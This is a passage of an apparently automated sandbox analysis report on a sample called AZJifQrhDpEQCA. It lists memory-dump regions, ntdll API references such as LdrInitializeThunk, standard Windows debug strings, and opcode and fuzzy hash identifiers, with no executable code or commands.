                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 47e61122f172937ae8d00d1a91354c76111bc0b577d20f17db9dcb0ecfece106
                                                • Instruction ID: f6c3b1d9a17d968a2e49635b92f18c3a7a27fe1d8aa7139e2ade80c0bba2b3ce
                                                • Opcode Fuzzy Hash: 47e61122f172937ae8d00d1a91354c76111bc0b577d20f17db9dcb0ecfece106
                                                • Instruction Fuzzy Hash: 7190023160550402D10471584618706101597D0201F65C421A0425578DC7958A5166A2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4 1162b60-1162b6c LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(01190DBD,?,?,?,?,01184302), ref: 01162B6A
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 97f3f715e450d75a5fb9a87e48f562db2134a1d4205c07e97bc8e1b51cf6ee01
                                                • Instruction ID: ee57ec8d60bc5d85c39ed338f11116dacb4ec1f7d13f52e05984c22b96c65e44
                                                • Opcode Fuzzy Hash: 97f3f715e450d75a5fb9a87e48f562db2134a1d4205c07e97bc8e1b51cf6ee01
                                                • Instruction Fuzzy Hash: 9590026120240003410971584518616401A97E0201B55C031E10155A0DC62589916225

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 1162df0-1162dfc LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0119E73E,0000005A,011FD040,00000020,00000000,011FD040,00000080,01184A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0116AE00), ref: 01162DFA
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 16aa899cff463c1e899a53ed26cc8cac676d3867bf27b67460a8a8ef120266d8
                                                • Instruction ID: 042508d184cbd46dd115a12e78de89dd8edf7908fb042ff4b00972b947d89437
                                                • Opcode Fuzzy Hash: 16aa899cff463c1e899a53ed26cc8cac676d3867bf27b67460a8a8ef120266d8
                                                • Instruction Fuzzy Hash: 1790023120140413D11571584608707001997D0241F95C422A0425568DD7568A52A221

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 1162c70-1162c7c LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0111FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01177BE5,00001000,00004000,000000FF,?,00000000), ref: 01162C7A
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ec0472c0589dbdf518141de88c1adccb124e643231037fa7568986adb1b5651c
                                                • Instruction ID: d71efd5dc7b11a8a3131254ec157988a064c913faec088c8651181c2523f62f7
                                                • Opcode Fuzzy Hash: ec0472c0589dbdf518141de88c1adccb124e643231037fa7568986adb1b5651c
                                                • Instruction Fuzzy Hash: F890023120148802D1147158850874A001597D0301F59C421A4425668DC79589917221

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 8 42d79f 9 42d7a3-42d7b8 8->9 10 42d7be-42d7c5 9->10 11 42d7c7-42d7c9 10->11 12 42d7d9-42d7dc 10->12 11->12 13 42d7cb-42d7d7 call 42d763 11->13 13->12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: >
                                                • API String ID: 0-325317158
                                                • Opcode ID: ac0b90a2921b8b4b87005439004dc3a3b499ea42fb41ec72e2fef2368e930d8d
                                                • Instruction ID: 4a1ac05c77454eacf8ee53e46d91bd29597805342aa1498ae6ccd5dde9ba1219
                                                • Opcode Fuzzy Hash: ac0b90a2921b8b4b87005439004dc3a3b499ea42fb41ec72e2fef2368e930d8d
                                                • Instruction Fuzzy Hash: 4AE0D832B0022433D6216A49AC0AF97779CCBC1F60F48006AFE0897341E7ACA900C2E8

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 442f62d012a73f28da484176fa8fa01c85776a7b704259d85493f936d5429327
                                                • Instruction ID: 4271448dea9d105fa56ca72284096173999569e9fa6681c89d5a34676f9a7603
                                                • Opcode Fuzzy Hash: 442f62d012a73f28da484176fa8fa01c85776a7b704259d85493f936d5429327
                                                • Instruction Fuzzy Hash: 64313521A886668BC311AB7C64C22DE7F20DF673303944AABC481CF681EA159913C3DE

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4d084e5a53d3ff122135d0dee7fe90161cc350c96c65b62282fa447d0194857
                                                • Instruction ID: 74ef00848ca0dbf3c54f6f02862389169a9d483b4a2a89aa5cf51ef78fe7d416
                                                • Opcode Fuzzy Hash: b4d084e5a53d3ff122135d0dee7fe90161cc350c96c65b62282fa447d0194857
                                                • Instruction Fuzzy Hash: 77110B717446147BD610DB65DC82FDB739CDF89714F80005EFA0C8B141D6B5AE4183E5

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8b5b6527aca6cdceab5b792cec4a554bb54598368c0bab5ac9b89d69161ef3da
                                                • Instruction ID: a43fa10a4b7e56e9f64a2f3da58ad2d6bdbb16579d796921415ee1d64c98ad4b
                                                • Opcode Fuzzy Hash: 8b5b6527aca6cdceab5b792cec4a554bb54598368c0bab5ac9b89d69161ef3da
                                                • Instruction Fuzzy Hash: 8501DB71E4021856FB20EB91EC46FD973749B48304F940ADFB50CA6582FB79A7448F95

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95434a5b30f10c527bd9ad3f114da260538c72fd43db1b6d58504dd90ab6435b
                                                • Instruction ID: 25006c249a9391471495b67bfc2ebdd31ad6c1e806e0a31c38e664269ee6bedb
                                                • Opcode Fuzzy Hash: 95434a5b30f10c527bd9ad3f114da260538c72fd43db1b6d58504dd90ab6435b
                                                • Instruction Fuzzy Hash: 8B01DB71E4021856FB20EB51EC46FD973789B48304F540ADFB50C62582FF79A7448F99

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0d106c31891a226cd87e7a5c0fe3ccec5d5b48e0463ffdbb6e27cbba1f7dafa
                                                • Instruction ID: 8e7756f43fb11b1c9e872fadfe7107a356797b4b26212f5eb67ff1b9c473cb15
                                                • Opcode Fuzzy Hash: d0d106c31891a226cd87e7a5c0fe3ccec5d5b48e0463ffdbb6e27cbba1f7dafa
                                                • Instruction Fuzzy Hash: 02E022327841143AD700AAE6AC86FAA2658DB88B24F40006AFA0CDB282E5A88D0043F4

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d855515dfe2b777dace57eedeb7056ae2960c372e5587c5cad37ab8c17c4d6a
                                                • Instruction ID: 65aa4b60b3ddd817e293add9dca286cf99b56794a8c65d55924eb08e8d4cd6ac
                                                • Opcode Fuzzy Hash: 9d855515dfe2b777dace57eedeb7056ae2960c372e5587c5cad37ab8c17c4d6a
                                                • Instruction Fuzzy Hash: 11F01D76610209AFDB04CF95C882EEAB3F8EB48310F00811DFD198B201DB74E910CBA0

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76c504f026082276b3608445f7be10b02be9d50f77e9918002891f0a72ac3766
                                                • Instruction ID: 998882118915395bb35563179bdb29e558390290e9ccfa098db48fbe3e5c25af
                                                • Opcode Fuzzy Hash: 76c504f026082276b3608445f7be10b02be9d50f77e9918002891f0a72ac3766
                                                • Instruction Fuzzy Hash: 9DF09E71E0022059DF20D7A0EC42FE573249B44305F5446DFB80895241FB7CEB048EA4

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 823a1879bcf978bd2c6715ad8f00c79c8a688764793c1040089daf54adcc501b
                                                • Instruction ID: 92b6d83568336df7de99300e766123c0dbb1358af96b72ff300b664d13505607
                                                • Opcode Fuzzy Hash: 823a1879bcf978bd2c6715ad8f00c79c8a688764793c1040089daf54adcc501b
                                                • Instruction Fuzzy Hash: 01F098B6610209AFDB04CF59D881EEA73A9EB88750F44C559FD198B241D774EA108BA0

                                                Control-flow Graph
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7aed85db8528c3922d778dacedcfccdaa374b7acb2e6fd9c25e4ce553da9b479
                                                • Instruction ID: 7187ff750906de1c20f3aa786ee3c13c426d67c0b10060703f7d15ccc5defce3
                                                • Opcode Fuzzy Hash: 7aed85db8528c3922d778dacedcfccdaa374b7acb2e6fd9c25e4ce553da9b479
                                                • Instruction Fuzzy Hash: BFE04836B0022427C52155496C05F97775CCBC5F60F450066FE0997341E768A90182E8
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1959795960.000000000042C000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42c000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2afd5def0751908ef88e909b11a7362658ac992ea83bdb4015ac39d7ec56f8c5
                                                • Instruction ID: ef5722dc65a7e9e46a9eefea3ac03a5c9e92342e637b59ada8f8330ea0a96610
                                                • Opcode Fuzzy Hash: 2afd5def0751908ef88e909b11a7362658ac992ea83bdb4015ac39d7ec56f8c5
                                                • Instruction Fuzzy Hash: 0BC012716003086BD600DB88DC46FA6339C9748610F404055B90C8B241D570B9504698
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID:
                                                • API String ID: 48624451-0
                                                • Opcode ID: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                • Instruction ID: 2ba4efefba175c9783a044ff9f5260d99f295b6afb249f79cc2384b97eaa1d91
                                                • Opcode Fuzzy Hash: 2ffddb0a35f4133ba196b4b37f91d802fbc65dc3e73c794b34b306dd9b87b5a3
                                                • Instruction Fuzzy Hash: D451F5B2A00216AFDB1DDB9C8C9097EFBBCBB49240714C229E4A5D7645E375DE148BA0
                                                Strings
                                                • SsHd, xrefs: 0113A3E4
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879FA
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 011879D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 011879D0, 011879F5
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-929470617
                                                • Opcode ID: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                • Instruction ID: 0ba232c0d5b3d5cf41f058b6593831bc9f36888f55839b95f86a9e8ad3c5788f
                                                • Opcode Fuzzy Hash: f4f79f57adb79422fd90b917157567f307b9f3ace3f00aff55d6cbc58fb0a1b3
                                                • Instruction Fuzzy Hash: 62E1D3716083028FD72DCE28D484B6ABBE0AFC5324F194A2DE9E5CB2D5E731D945CB42
                                                APIs
                                                Strings
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0118936B
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01189346
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01189341, 01189366
                                                • GsHd, xrefs: 0113D874
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                • API String ID: 3446177414-576511823
                                                • Opcode ID: 50c76668f12b07e7f3ed93e93fbc3cbaadadcfdc61009fd7d61cd725ad0e2431
                                                • Instruction ID: b7d34b8b39d6e64646bcccff03cbfcc1e526c135d41a45225c8090a618cac80e
                                                • Opcode Fuzzy Hash: 50c76668f12b07e7f3ed93e93fbc3cbaadadcfdc61009fd7d61cd725ad0e2431
                                                • Instruction Fuzzy Hash: F9E1C4706083468FDB19CFA8D880B6ABBF5BFC8318F44496DE9958B285D770E944CF52
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction ID: 29756dc2e69fc6a16e1ea0c907cc392b281841179cca39f741f793cce2c74249
                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                • Instruction Fuzzy Hash: 9081C170F092498EEF2D8E6CC8517FEBBAEAF45320F184119D951E72D1C73A8860CB59
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                • Instruction ID: c67ad88442727b8bdbba4f81649f13f860a41032ee50c5335b197ea493dab8a6
                                                • Opcode Fuzzy Hash: e252244a14109d7ee210e0f300e594f32c304a3b79649f581a35d9c2ddc8659c
                                                • Instruction Fuzzy Hash: FA810A71D002799BDB3ADB54CC44BEEB6B8AF49754F1041DAEA19B7240D7709E84CFA0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                • API String ID: 3446177414-56086060
                                                • Opcode ID: d2d5b8fd3b509e04a32c6a7915e2abb33db1e1c58e48924c10c0ee7827ccb170
                                                • Instruction ID: f573f6a13e45a8e6aa6d1cdadab924fc1b097e6af6901c7ed0647604437072e1
                                                • Opcode Fuzzy Hash: d2d5b8fd3b509e04a32c6a7915e2abb33db1e1c58e48924c10c0ee7827ccb170
                                                • Instruction Fuzzy Hash: 0E416830600B46DFDB2EEF68D485B69B7F4FF15B28F248169E5014B791C774A882CB91
                                                APIs
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 011A488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 011A4899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011A4888
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000011B2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001213000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001219000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_10f0000_AZJifQrhDpEQCA.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 41e2868b9a652567d89c9c1b9bfc1184e220c2e7b03ef832743893baf6c12592
                                                • Instruction ID: 78a1d93b4d42e9cc0e8a1369fc583e83705ab0db2ecfbb91fd049db5d3384470
                                                • Opcode Fuzzy Hash: 41e2868b9a652567d89c9c1b9bfc1184e220c2e7b03ef832743893baf6c12592
                                                • Instruction Fuzzy Hash: 7741E63AA006919FCB29CF9CE840A267FE5FF49A50F4A016DED85D7B12D7B0D800CB81
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.1960763475.0000000001116000.00000040.00001000.00020000.00000000.sdmp, Offset: 010F0000, based on PE: true
                                                • Associated: 0000000F.00000002.1960763475.00000000010F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.00000000010F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001170000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.1960763475.0000000001176000.00000040.00001000.00020000.00000000.sdmp
